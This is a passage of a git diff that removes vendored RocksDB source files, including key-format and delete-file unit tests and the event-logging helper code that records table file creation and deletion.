-  ASSERT_EQ(IKey("foo", 100, kTypeValue),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("foo", 100, kTypeValue)));
-  ASSERT_EQ(IKey("foo", 100, kTypeValue),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("foo", 100, kTypeDeletion)));
-
-  // When user keys are misordered
-  ASSERT_EQ(IKey("foo", 100, kTypeValue),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("bar", 99, kTypeValue)));
-
-  // When user keys are different, but correctly ordered
-  ASSERT_EQ(IKey("g", kMaxSequenceNumber, kValueTypeForSeek),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("hello", 200, kTypeValue)));
-
-  ASSERT_EQ(IKey("ABC2", kMaxSequenceNumber, kValueTypeForSeek),
-            Shorten(IKey("ABC1AAAAA", 100, kTypeValue),
-                    IKey("ABC2ABB", 200, kTypeValue)));
-
-  ASSERT_EQ(IKey("AAA2", kMaxSequenceNumber, kValueTypeForSeek),
-            Shorten(IKey("AAA1AAA", 100, kTypeValue),
-                    IKey("AAA2AA", 200, kTypeValue)));
-
-  ASSERT_EQ(
-      IKey("AAA2", kMaxSequenceNumber, kValueTypeForSeek),
-      Shorten(IKey("AAA1AAA", 100, kTypeValue), IKey("AAA4", 200, kTypeValue)));
-
-  ASSERT_EQ(
-      IKey("AAA1B", kMaxSequenceNumber, kValueTypeForSeek),
-      Shorten(IKey("AAA1AAA", 100, kTypeValue), IKey("AAA2", 200, kTypeValue)));
-
-  ASSERT_EQ(IKey("AAA2", kMaxSequenceNumber, kValueTypeForSeek),
-            Shorten(IKey("AAA1AAA", 100, kTypeValue),
-                    IKey("AAA2A", 200, kTypeValue)));
-
-  ASSERT_EQ(
-      IKey("AAA1", 100, kTypeValue),
-      Shorten(IKey("AAA1", 100, kTypeValue), IKey("AAA2", 200, kTypeValue)));
-
-  // When start user key is prefix of limit user key
-  ASSERT_EQ(IKey("foo", 100, kTypeValue),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("foobar", 200, kTypeValue)));
-
-  // When limit user key is prefix of start user key
-  ASSERT_EQ(IKey("foobar", 100, kTypeValue),
-            Shorten(IKey("foobar", 100, kTypeValue),
-                    IKey("foo", 200, kTypeValue)));
-}
-
-TEST_F(FormatTest, InternalKeyShortestSuccessor) {
-  ASSERT_EQ(IKey("g", kMaxSequenceNumber, kValueTypeForSeek),
-            ShortSuccessor(IKey("foo", 100, kTypeValue)));
-  ASSERT_EQ(IKey("\xff\xff", 100, kTypeValue),
-            ShortSuccessor(IKey("\xff\xff", 100, kTypeValue)));
-}
-
-TEST_F(FormatTest, IterKeyOperation) {
-  IterKey k;
-  const char p[] = "abcdefghijklmnopqrstuvwxyz";
-  const char q[] = "0123456789";
-
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string(""));
-
-  k.TrimAppend(0, p, 3);
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("abc"));
-
-  k.TrimAppend(1, p, 3);
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("aabc"));
-
-  k.TrimAppend(0, p, 26);
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("abcdefghijklmnopqrstuvwxyz"));
-
-  k.TrimAppend(26, q, 10);
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("abcdefghijklmnopqrstuvwxyz0123456789"));
-
-  k.TrimAppend(36, q, 1);
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("abcdefghijklmnopqrstuvwxyz01234567890"));
-
-  k.TrimAppend(26, q, 1);
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("abcdefghijklmnopqrstuvwxyz0"));
-
-  // Size going up, memory allocation is triggered
-  k.TrimAppend(27, p, 26);
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("abcdefghijklmnopqrstuvwxyz0"
-                        "abcdefghijklmnopqrstuvwxyz"));
-}
-
-TEST_F(FormatTest, UpdateInternalKey) {
-  std::string user_key("abcdefghijklmnopqrstuvwxyz");
-  uint64_t new_seq = 0x123456;
-  ValueType new_val_type = kTypeDeletion;
-
-  std::string ikey;
-  AppendInternalKey(&ikey, ParsedInternalKey(user_key, 100U, kTypeValue));
-  size_t ikey_size = ikey.size();
-  UpdateInternalKey(&ikey, new_seq, new_val_type);
-  ASSERT_EQ(ikey_size, ikey.size());
-
-  Slice in(ikey);
-  ParsedInternalKey decoded;
-  ASSERT_TRUE(ParseInternalKey(in, &decoded));
-  ASSERT_EQ(user_key, decoded.user_key.ToString());
-  ASSERT_EQ(new_seq, decoded.sequence);
-  ASSERT_EQ(new_val_type, decoded.type);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/deletefile_test.cc b/thirdparty/rocksdb/db/deletefile_test.cc
deleted file mode 100644
index 989c0c4..0000000
--- a/thirdparty/rocksdb/db/deletefile_test.cc
+++ /dev/null
@@ -1,509 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include <stdlib.h>
-#include <map>
-#include <string>
-#include <vector>
-#include "db/db_impl.h"
-#include "db/version_set.h"
-#include "db/write_batch_internal.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/transaction_log.h"
-#include "util/filename.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class DeleteFileTest : public testing::Test {
- public:
-  std::string dbname_;
-  Options options_;
-  DB* db_;
-  Env* env_;
-  int numlevels_;
-
-  DeleteFileTest() {
-    db_ = nullptr;
-    env_ = Env::Default();
-    options_.delete_obsolete_files_period_micros = 0;  // always do full purge
-    options_.enable_thread_tracking = true;
-    options_.write_buffer_size = 1024*1024*1000;
-    options_.target_file_size_base = 1024*1024*1000;
-    options_.max_bytes_for_level_base = 1024*1024*1000;
-    options_.WAL_ttl_seconds = 300; // Used to test log files
-    options_.WAL_size_limit_MB = 1024; // Used to test log files
-    dbname_ = test::TmpDir() + "/deletefile_test";
-    options_.wal_dir = dbname_ + "/wal_files";
-
-    // clean up all the files that might have been there before
-    std::vector<std::string> old_files;
-    env_->GetChildren(dbname_, &old_files);
-    for (auto file : old_files) {
-      env_->DeleteFile(dbname_ + "/" + file);
-    }
-    env_->GetChildren(options_.wal_dir, &old_files);
-    for (auto file : old_files) {
-      env_->DeleteFile(options_.wal_dir + "/" + file);
-    }
-
-    DestroyDB(dbname_, options_);
-    numlevels_ = 7;
-    EXPECT_OK(ReopenDB(true));
-  }
-
-  Status ReopenDB(bool create) {
-    delete db_;
-    if (create) {
-      DestroyDB(dbname_, options_);
-    }
-    db_ = nullptr;
-    options_.create_if_missing = create;
-    return DB::Open(options_, dbname_, &db_);
-  }
-
-  void CloseDB() {
-    delete db_;
-    db_ = nullptr;
-  }
-
-  void AddKeys(int numkeys, int startkey = 0) {
-    WriteOptions options;
-    options.sync = false;
-    ReadOptions roptions;
-    for (int i = startkey; i < (numkeys + startkey) ; i++) {
-      std::string temp = ToString(i);
-      Slice key(temp);
-      Slice value(temp);
-      ASSERT_OK(db_->Put(options, key, value));
-    }
-  }
-
-  int numKeysInLevels(
-    std::vector<LiveFileMetaData> &metadata,
-    std::vector<int> *keysperlevel = nullptr) {
-
-    if (keysperlevel != nullptr) {
-      keysperlevel->resize(numlevels_);
-    }
-
-    int numKeys = 0;
-    for (size_t i = 0; i < metadata.size(); i++) {
-      int startkey = atoi(metadata[i].smallestkey.c_str());
-      int endkey = atoi(metadata[i].largestkey.c_str());
-      int numkeysinfile = (endkey - startkey + 1);
-      numKeys += numkeysinfile;
-      if (keysperlevel != nullptr) {
-        (*keysperlevel)[(int)metadata[i].level] += numkeysinfile;
-      }
-      fprintf(stderr, "level %d name %s smallest %s largest %s\n",
-              metadata[i].level, metadata[i].name.c_str(),
-              metadata[i].smallestkey.c_str(),
-              metadata[i].largestkey.c_str());
-    }
-    return numKeys;
-  }
-
-  void CreateTwoLevels() {
-    AddKeys(50000, 10000);
-    DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-    ASSERT_OK(dbi->TEST_FlushMemTable());
-    ASSERT_OK(dbi->TEST_WaitForFlushMemTable());
-    for (int i = 0; i < 2; ++i) {
-      ASSERT_OK(dbi->TEST_CompactRange(i, nullptr, nullptr));
-    }
-
-    AddKeys(50000, 10000);
-    ASSERT_OK(dbi->TEST_FlushMemTable());
-    ASSERT_OK(dbi->TEST_WaitForFlushMemTable());
-    ASSERT_OK(dbi->TEST_CompactRange(0, nullptr, nullptr));
-  }
-
-  void CheckFileTypeCounts(std::string& dir,
-                            int required_log,
-                            int required_sst,
-                            int required_manifest) {
-    std::vector<std::string> filenames;
-    env_->GetChildren(dir, &filenames);
-
-    int log_cnt = 0, sst_cnt = 0, manifest_cnt = 0;
-    for (auto file : filenames) {
-      uint64_t number;
-      FileType type;
-      if (ParseFileName(file, &number, &type)) {
-        log_cnt += (type == kLogFile);
-        sst_cnt += (type == kTableFile);
-        manifest_cnt += (type == kDescriptorFile);
-      }
-    }
-    ASSERT_EQ(required_log, log_cnt);
-    ASSERT_EQ(required_sst, sst_cnt);
-    ASSERT_EQ(required_manifest, manifest_cnt);
-  }
-
-  static void DoSleep(void* arg) {
-    auto test = reinterpret_cast<DeleteFileTest*>(arg);
-    test->env_->SleepForMicroseconds(2 * 1000 * 1000);
-  }
-
-  // An empty job to guard all jobs are processed
-  static void GuardFinish(void* arg) {
-    TEST_SYNC_POINT("DeleteFileTest::GuardFinish");
-  }
-};
-
-TEST_F(DeleteFileTest, AddKeysAndQueryLevels) {
-  CreateTwoLevels();
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-
-  std::string level1file = "";
-  int level1keycount = 0;
-  std::string level2file = "";
-  int level2keycount = 0;
-  int level1index = 0;
-  int level2index = 1;
-
-  ASSERT_EQ((int)metadata.size(), 2);
-  if (metadata[0].level == 2) {
-    level1index = 1;
-    level2index = 0;
-  }
-
-  level1file = metadata[level1index].name;
-  int startkey = atoi(metadata[level1index].smallestkey.c_str());
-  int endkey = atoi(metadata[level1index].largestkey.c_str());
-  level1keycount = (endkey - startkey + 1);
-  level2file = metadata[level2index].name;
-  startkey = atoi(metadata[level2index].smallestkey.c_str());
-  endkey = atoi(metadata[level2index].largestkey.c_str());
-  level2keycount = (endkey - startkey + 1);
-
-  // COntrolled setup. Levels 1 and 2 should both have 50K files.
-  // This is a little fragile as it depends on the current
-  // compaction heuristics.
-  ASSERT_EQ(level1keycount, 50000);
-  ASSERT_EQ(level2keycount, 50000);
-
-  Status status = db_->DeleteFile("0.sst");
-  ASSERT_TRUE(status.IsInvalidArgument());
-
-  // intermediate level files cannot be deleted.
-  status = db_->DeleteFile(level1file);
-  ASSERT_TRUE(status.IsInvalidArgument());
-
-  // Lowest level file deletion should succeed.
-  ASSERT_OK(db_->DeleteFile(level2file));
-
-  CloseDB();
-}
-
-TEST_F(DeleteFileTest, PurgeObsoleteFilesTest) {
-  CreateTwoLevels();
-  // there should be only one (empty) log file because CreateTwoLevels()
-  // flushes the memtables to disk
-  CheckFileTypeCounts(options_.wal_dir, 1, 0, 0);
-  // 2 ssts, 1 manifest
-  CheckFileTypeCounts(dbname_, 0, 2, 1);
-  std::string first("0"), last("999999");
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 2;
-  Slice first_slice(first), last_slice(last);
-  db_->CompactRange(compact_options, &first_slice, &last_slice);
-  // 1 sst after compaction
-  CheckFileTypeCounts(dbname_, 0, 1, 1);
-
-  // this time, we keep an iterator alive
-  ReopenDB(true);
-  Iterator *itr = 0;
-  CreateTwoLevels();
-  itr = db_->NewIterator(ReadOptions());
-  db_->CompactRange(compact_options, &first_slice, &last_slice);
-  // 3 sst after compaction with live iterator
-  CheckFileTypeCounts(dbname_, 0, 3, 1);
-  delete itr;
-  // 1 sst after iterator deletion
-  CheckFileTypeCounts(dbname_, 0, 1, 1);
-
-  CloseDB();
-}
-
-TEST_F(DeleteFileTest, BackgroundPurgeTest) {
-  std::string first("0"), last("999999");
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 2;
-  Slice first_slice(first), last_slice(last);
-
-  // We keep an iterator alive
-  Iterator* itr = 0;
-  CreateTwoLevels();
-  ReadOptions options;
-  options.background_purge_on_iterator_cleanup = true;
-  itr = db_->NewIterator(options);
-  db_->CompactRange(compact_options, &first_slice, &last_slice);
-  // 3 sst after compaction with live iterator
-  CheckFileTypeCounts(dbname_, 0, 3, 1);
-  test::SleepingBackgroundTask sleeping_task_before;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                 &sleeping_task_before, Env::Priority::HIGH);
-  delete itr;
-  test::SleepingBackgroundTask sleeping_task_after;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                 &sleeping_task_after, Env::Priority::HIGH);
-
-  // Make sure no purges are executed foreground
-  CheckFileTypeCounts(dbname_, 0, 3, 1);
-  sleeping_task_before.WakeUp();
-  sleeping_task_before.WaitUntilDone();
-
-  // Make sure all background purges are executed
-  sleeping_task_after.WakeUp();
-  sleeping_task_after.WaitUntilDone();
-  // 1 sst after iterator deletion
-  CheckFileTypeCounts(dbname_, 0, 1, 1);
-
-  CloseDB();
-}
-
-// This test is to reproduce a bug that read invalid ReadOption in iterator
-// cleanup function
-TEST_F(DeleteFileTest, BackgroundPurgeCopyOptions) {
-  std::string first("0"), last("999999");
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 2;
-  Slice first_slice(first), last_slice(last);
-
-  // We keep an iterator alive
-  Iterator* itr = 0;
-  CreateTwoLevels();
-  ReadOptions* options = new ReadOptions();
-  options->background_purge_on_iterator_cleanup = true;
-  itr = db_->NewIterator(*options);
-  // ReadOptions is deleted, but iterator cleanup function should not be
-  // affected
-  delete options;
-
-  db_->CompactRange(compact_options, &first_slice, &last_slice);
-  // 3 sst after compaction with live iterator
-  CheckFileTypeCounts(dbname_, 0, 3, 1);
-  delete itr;
-
-  test::SleepingBackgroundTask sleeping_task_after;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                 &sleeping_task_after, Env::Priority::HIGH);
-
-  // Make sure all background purges are executed
-  sleeping_task_after.WakeUp();
-  sleeping_task_after.WaitUntilDone();
-  // 1 sst after iterator deletion
-  CheckFileTypeCounts(dbname_, 0, 1, 1);
-
-  CloseDB();
-}
-
-TEST_F(DeleteFileTest, BackgroundPurgeTestMultipleJobs) {
-  std::string first("0"), last("999999");
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 2;
-  Slice first_slice(first), last_slice(last);
-
-  // We keep an iterator alive
-  CreateTwoLevels();
-  ReadOptions options;
-  options.background_purge_on_iterator_cleanup = true;
-  Iterator* itr1 = db_->NewIterator(options);
-  CreateTwoLevels();
-  Iterator* itr2 = db_->NewIterator(options);
-  db_->CompactRange(compact_options, &first_slice, &last_slice);
-  // 5 sst files after 2 compactions with 2 live iterators
-  CheckFileTypeCounts(dbname_, 0, 5, 1);
-
-  // ~DBImpl should wait until all BGWorkPurge are finished
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::~DBImpl:WaitJob", "DBImpl::BGWorkPurge"},
-       {"DeleteFileTest::GuardFinish",
-        "DeleteFileTest::BackgroundPurgeTestMultipleJobs:DBClose"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  delete itr1;
-  env_->Schedule(&DeleteFileTest::DoSleep, this, Env::Priority::HIGH);
-  delete itr2;
-  env_->Schedule(&DeleteFileTest::GuardFinish, nullptr, Env::Priority::HIGH);
-  CloseDB();
-
-  TEST_SYNC_POINT("DeleteFileTest::BackgroundPurgeTestMultipleJobs:DBClose");
-  // 1 sst after iterator deletion
-  CheckFileTypeCounts(dbname_, 0, 1, 1);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DeleteFileTest, DeleteFileWithIterator) {
-  CreateTwoLevels();
-  ReadOptions options;
-  Iterator* it = db_->NewIterator(options);
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-
-  std::string level2file = "";
-
-  ASSERT_EQ((int)metadata.size(), 2);
-  if (metadata[0].level == 1) {
-    level2file = metadata[1].name;
-  } else {
-    level2file = metadata[0].name;
-  }
-
-  Status status = db_->DeleteFile(level2file);
-  fprintf(stdout, "Deletion status %s: %s\n",
-          level2file.c_str(), status.ToString().c_str());
-  ASSERT_TRUE(status.ok());
-  it->SeekToFirst();
-  int numKeysIterated = 0;
-  while(it->Valid()) {
-    numKeysIterated++;
-    it->Next();
-  }
-  ASSERT_EQ(numKeysIterated, 50000);
-  delete it;
-  CloseDB();
-}
-
-TEST_F(DeleteFileTest, DeleteLogFiles) {
-  AddKeys(10, 0);
-  VectorLogPtr logfiles;
-  db_->GetSortedWalFiles(logfiles);
-  ASSERT_GT(logfiles.size(), 0UL);
-  // Take the last log file which is expected to be alive and try to delete it
-  // Should not succeed because live logs are not allowed to be deleted
-  std::unique_ptr<LogFile> alive_log = std::move(logfiles.back());
-  ASSERT_EQ(alive_log->Type(), kAliveLogFile);
-  ASSERT_OK(env_->FileExists(options_.wal_dir + "/" + alive_log->PathName()));
-  fprintf(stdout, "Deleting alive log file %s\n",
-          alive_log->PathName().c_str());
-  ASSERT_TRUE(!db_->DeleteFile(alive_log->PathName()).ok());
-  ASSERT_OK(env_->FileExists(options_.wal_dir + "/" + alive_log->PathName()));
-  logfiles.clear();
-
-  // Call Flush to bring about a new working log file and add more keys
-  // Call Flush again to flush out memtable and move alive log to archived log
-  // and try to delete the archived log file
-  FlushOptions fopts;
-  db_->Flush(fopts);
-  AddKeys(10, 0);
-  db_->Flush(fopts);
-  db_->GetSortedWalFiles(logfiles);
-  ASSERT_GT(logfiles.size(), 0UL);
-  std::unique_ptr<LogFile> archived_log = std::move(logfiles.front());
-  ASSERT_EQ(archived_log->Type(), kArchivedLogFile);
-  ASSERT_OK(
-      env_->FileExists(options_.wal_dir + "/" + archived_log->PathName()));
-  fprintf(stdout, "Deleting archived log file %s\n",
-          archived_log->PathName().c_str());
-  ASSERT_OK(db_->DeleteFile(archived_log->PathName()));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(options_.wal_dir + "/" +
-                                                 archived_log->PathName()));
-  CloseDB();
-}
-
-TEST_F(DeleteFileTest, DeleteNonDefaultColumnFamily) {
-  CloseDB();
-  DBOptions db_options;
-  db_options.create_if_missing = true;
-  db_options.create_missing_column_families = true;
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.emplace_back();
-  column_families.emplace_back("new_cf", ColumnFamilyOptions());
-
-  std::vector<rocksdb::ColumnFamilyHandle*> handles;
-  rocksdb::DB* db;
-  ASSERT_OK(DB::Open(db_options, dbname_, column_families, &handles, &db));
-
-  Random rnd(5);
-  for (int i = 0; i < 1000; ++i) {
-    ASSERT_OK(db->Put(WriteOptions(), handles[1], test::RandomKey(&rnd, 10),
-                      test::RandomKey(&rnd, 10)));
-  }
-  ASSERT_OK(db->Flush(FlushOptions(), handles[1]));
-  for (int i = 0; i < 1000; ++i) {
-    ASSERT_OK(db->Put(WriteOptions(), handles[1], test::RandomKey(&rnd, 10),
-                      test::RandomKey(&rnd, 10)));
-  }
-  ASSERT_OK(db->Flush(FlushOptions(), handles[1]));
-
-  std::vector<LiveFileMetaData> metadata;
-  db->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(2U, metadata.size());
-  ASSERT_EQ("new_cf", metadata[0].column_family_name);
-  ASSERT_EQ("new_cf", metadata[1].column_family_name);
-  auto old_file = metadata[0].smallest_seqno < metadata[1].smallest_seqno
-                      ? metadata[0].name
-                      : metadata[1].name;
-  auto new_file = metadata[0].smallest_seqno > metadata[1].smallest_seqno
-                      ? metadata[0].name
-                      : metadata[1].name;
-  ASSERT_TRUE(db->DeleteFile(new_file).IsInvalidArgument());
-  ASSERT_OK(db->DeleteFile(old_file));
-
-  {
-    std::unique_ptr<Iterator> itr(db->NewIterator(ReadOptions(), handles[1]));
-    int count = 0;
-    for (itr->SeekToFirst(); itr->Valid(); itr->Next()) {
-      ASSERT_OK(itr->status());
-      ++count;
-    }
-    ASSERT_EQ(count, 1000);
-  }
-
-  delete handles[0];
-  delete handles[1];
-  delete db;
-
-  ASSERT_OK(DB::Open(db_options, dbname_, column_families, &handles, &db));
-  {
-    std::unique_ptr<Iterator> itr(db->NewIterator(ReadOptions(), handles[1]));
-    int count = 0;
-    for (itr->SeekToFirst(); itr->Valid(); itr->Next()) {
-      ASSERT_OK(itr->status());
-      ++count;
-    }
-    ASSERT_EQ(count, 1000);
-  }
-
-  delete handles[0];
-  delete handles[1];
-  delete db;
-}
-
-} //namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as DBImpl::DeleteFile is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/event_helpers.cc b/thirdparty/rocksdb/db/event_helpers.cc
deleted file mode 100644
index 1b79acb..0000000
--- a/thirdparty/rocksdb/db/event_helpers.cc
+++ /dev/null
@@ -1,155 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/event_helpers.h"
-
-namespace rocksdb {
-
-namespace {
-template<class T>
-inline T SafeDivide(T a, T b) {
-  return b == 0 ? 0 : a / b;
-}
-}  // namespace
-
-void EventHelpers::AppendCurrentTime(JSONWriter* jwriter) {
-  *jwriter << "time_micros"
-           << std::chrono::duration_cast<std::chrono::microseconds>(
-                  std::chrono::system_clock::now().time_since_epoch()).count();
-}
-
-#ifndef ROCKSDB_LITE
-void EventHelpers::NotifyTableFileCreationStarted(
-    const std::vector<std::shared_ptr<EventListener>>& listeners,
-    const std::string& db_name, const std::string& cf_name,
-    const std::string& file_path, int job_id, TableFileCreationReason reason) {
-  TableFileCreationBriefInfo info;
-  info.db_name = db_name;
-  info.cf_name = cf_name;
-  info.file_path = file_path;
-  info.job_id = job_id;
-  info.reason = reason;
-  for (auto& listener : listeners) {
-    listener->OnTableFileCreationStarted(info);
-  }
-}
-#endif  // !ROCKSDB_LITE
-
-void EventHelpers::NotifyOnBackgroundError(
-    const std::vector<std::shared_ptr<EventListener>>& listeners,
-    BackgroundErrorReason reason, Status* bg_error,
-    InstrumentedMutex* db_mutex) {
-#ifndef ROCKSDB_LITE
-  if (listeners.size() == 0U) {
-    return;
-  }
-  db_mutex->AssertHeld();
-  // release lock while notifying events
-  db_mutex->Unlock();
-  for (auto& listener : listeners) {
-    listener->OnBackgroundError(reason, bg_error);
-  }
-  db_mutex->Lock();
-#endif  // ROCKSDB_LITE
-}
-
-void EventHelpers::LogAndNotifyTableFileCreationFinished(
-    EventLogger* event_logger,
-    const std::vector<std::shared_ptr<EventListener>>& listeners,
-    const std::string& db_name, const std::string& cf_name,
-    const std::string& file_path, int job_id, const FileDescriptor& fd,
-    const TableProperties& table_properties, TableFileCreationReason reason,
-    const Status& s) {
-  if (s.ok() && event_logger) {
-    JSONWriter jwriter;
-    AppendCurrentTime(&jwriter);
-    jwriter << "cf_name" << cf_name << "job" << job_id << "event"
-            << "table_file_creation"
-            << "file_number" << fd.GetNumber() << "file_size"
-            << fd.GetFileSize();
-
-    // table_properties
-    {
-      jwriter << "table_properties";
-      jwriter.StartObject();
-
-      // basic properties:
-      jwriter << "data_size" << table_properties.data_size << "index_size"
-              << table_properties.index_size << "filter_size"
-              << table_properties.filter_size << "raw_key_size"
-              << table_properties.raw_key_size << "raw_average_key_size"
-              << SafeDivide(table_properties.raw_key_size,
-                            table_properties.num_entries)
-              << "raw_value_size" << table_properties.raw_value_size
-              << "raw_average_value_size"
-              << SafeDivide(table_properties.raw_value_size,
-                            table_properties.num_entries)
-              << "num_data_blocks" << table_properties.num_data_blocks
-              << "num_entries" << table_properties.num_entries
-              << "filter_policy_name" << table_properties.filter_policy_name;
-
-      // user collected properties
-      for (const auto& prop : table_properties.readable_properties) {
-        jwriter << prop.first << prop.second;
-      }
-      jwriter.EndObject();
-    }
-    jwriter.EndObject();
-
-    event_logger->Log(jwriter);
-  }
-
-#ifndef ROCKSDB_LITE
-  if (listeners.size() == 0) {
-    return;
-  }
-  TableFileCreationInfo info;
-  info.db_name = db_name;
-  info.cf_name = cf_name;
-  info.file_path = file_path;
-  info.file_size = fd.file_size;
-  info.job_id = job_id;
-  info.table_properties = table_properties;
-  info.reason = reason;
-  info.status = s;
-  for (auto& listener : listeners) {
-    listener->OnTableFileCreated(info);
-  }
-#endif  // !ROCKSDB_LITE
-}
-
-void EventHelpers::LogAndNotifyTableFileDeletion(
-    EventLogger* event_logger, int job_id,
-    uint64_t file_number, const std::string& file_path,
-    const Status& status, const std::string& dbname,
-    const std::vector<std::shared_ptr<EventListener>>& listeners) {
-
-  JSONWriter jwriter;
-  AppendCurrentTime(&jwriter);
-
-  jwriter << "job" << job_id
-          << "event" << "table_file_deletion"
-          << "file_number" << file_number;
-  if (!status.ok()) {
-    jwriter << "status" << status.ToString();
-  }
-
-  jwriter.EndObject();
-
-  event_logger->Log(jwriter);
-
-#ifndef ROCKSDB_LITE
-  TableFileDeletionInfo info;
-  info.db_name = dbname;
-  info.job_id = job_id;
-  info.file_path = file_path;
-  info.status = status;
-  for (auto& listener : listeners) {
-    listener->OnTableFileDeleted(info);
-  }
-#endif  // !ROCKSDB_LITE
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/event_helpers.h b/thirdparty/rocksdb/db/event_helpers.h
deleted file mode 100644
index 674e6c5..0000000
--- a/thirdparty/rocksdb/db/event_helpers.h
+++ /dev/null
@@ -1,52 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/version_edit.h"
-#include "rocksdb/listener.h"
-#include "rocksdb/table_properties.h"
-#include "util/event_logger.h"
-
-namespace rocksdb {
-
-class EventHelpers {
- public:
-  static void AppendCurrentTime(JSONWriter* json_writer);
-#ifndef ROCKSDB_LITE
-  static void NotifyTableFileCreationStarted(
-      const std::vector<std::shared_ptr<EventListener>>& listeners,
-      const std::string& db_name, const std::string& cf_name,
-      const std::string& file_path, int job_id, TableFileCreationReason reason);
-#endif  // !ROCKSDB_LITE
-  static void NotifyOnBackgroundError(
-      const std::vector<std::shared_ptr<EventListener>>& listeners,
-      BackgroundErrorReason reason, Status* bg_error,
-      InstrumentedMutex* db_mutex);
-  static void LogAndNotifyTableFileCreationFinished(
-      EventLogger* event_logger,
-      const std::vector<std::shared_ptr<EventListener>>& listeners,
-      const std::string& db_name, const std::string& cf_name,
-      const std::string& file_path, int job_id, const FileDescriptor& fd,
-      const TableProperties& table_properties, TableFileCreationReason reason,
-      const Status& s);
-  static void LogAndNotifyTableFileDeletion(
-      EventLogger* event_logger, int job_id,
-      uint64_t file_number, const std::string& file_path,
-      const Status& status, const std::string& db_name,
-      const std::vector<std::shared_ptr<EventListener>>& listeners);
-
- private:
-  static void LogAndNotifyTableFileCreation(
-      EventLogger* event_logger,
-      const std::vector<std::shared_ptr<EventListener>>& listeners,
-      const FileDescriptor& fd, const TableFileCreationInfo& info);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/experimental.cc b/thirdparty/rocksdb/db/experimental.cc
deleted file mode 100644
index effe9d7..0000000
--- a/thirdparty/rocksdb/db/experimental.cc
+++ /dev/null
@@ -1,49 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/experimental.h"
-
-#include "db/db_impl.h"
-
-namespace rocksdb {
-namespace experimental {
-
-#ifndef ROCKSDB_LITE
-
-Status SuggestCompactRange(DB* db, ColumnFamilyHandle* column_family,
-                           const Slice* begin, const Slice* end) {
-  if (db == nullptr) {
-    return Status::InvalidArgument("DB is empty");
-  }
-
-  return db->SuggestCompactRange(column_family, begin, end);
-}
-
-Status PromoteL0(DB* db, ColumnFamilyHandle* column_family, int target_level) {
-  if (db == nullptr) {
-    return Status::InvalidArgument("Didn't recognize DB object");
-  }
-  return db->PromoteL0(column_family, target_level);
-}
-
